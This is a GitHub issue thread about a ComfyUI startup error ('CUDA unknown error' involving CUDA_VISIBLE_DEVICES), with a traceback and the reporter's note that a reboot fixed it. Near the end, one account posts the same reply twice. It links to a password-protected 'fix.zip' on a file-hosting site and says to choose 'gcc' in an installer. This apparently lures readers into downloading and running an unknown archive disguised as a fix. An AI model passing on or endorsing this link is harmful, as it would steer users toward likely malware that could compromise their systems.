### ISSUE TITLE
Fresh installation - CUDA_VISIBLE_DEVICES after program start

### ISSUE THREAD

**Issue by WasamiKirua** [comfyanonymous/ComfyUI#4615]
### Expected Behavior

Successfully start

### Actual Behavior

CUDA_VISIBLE_DEVICES after program start. Setting the available devices to be zero.

### Steps to Reproduce

1) clone repo
2) pip install -r requirements.txt
3) python main.py

### Debug Logs

```powershell
Traceback (most recent call last):
  File "/run/media/wasami/data/new/ComfyUI/main.py", line 86, in <module>
    import execution
  File "/run/media/wasami/data/new/ComfyUI/execution.py", line 13, in <module>
    import nodes
  File "/run/media/wasami/data/new/ComfyUI/nodes.py", line 21, in <module>
    import comfy.diffusers_load
  File "/run/media/wasami/data/new/ComfyUI/comfy/diffusers_load.py", line 3, in <module>
    import comfy.sd
  File "/run/media/wasami/data/new/ComfyUI/comfy/sd.py", line 5, in <module>
    from comfy import model_management
  File "/run/media/wasami/data/new/ComfyUI/comfy/model_management.py", line 142, in <module>
    total_vram = get_total_memory(get_torch_device()) / (1024 * 1024)
  File "/run/media/wasami/data/new/ComfyUI/comfy/model_management.py", line 111, in get_torch_device
    return torch.device(torch.cuda.current_device())
  File "/home/wasami/anaconda3/envs/sd/lib/python3.10/site-packages/torch/cuda/__init__.py", line 878, in current_device
    _lazy_init()
  File "/home/wasami/anaconda3/envs/sd/lib/python3.10/site-packages/torch/cuda/__init__.py", line 314, in _lazy_init
    torch._C._cuda_init()
RuntimeError: CUDA unknown error - this may be due to an incorrectly set up environment, e.g. changing env variable CUDA_VISIBLE_DEVICES after program start. Setting the available devices to be zero.
```

**Comment by WasamiKirua** [comment]
sorry for this i have no idea what happened to my sistem, resolved after reboot. Mnajaro linux, rtx 3080

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
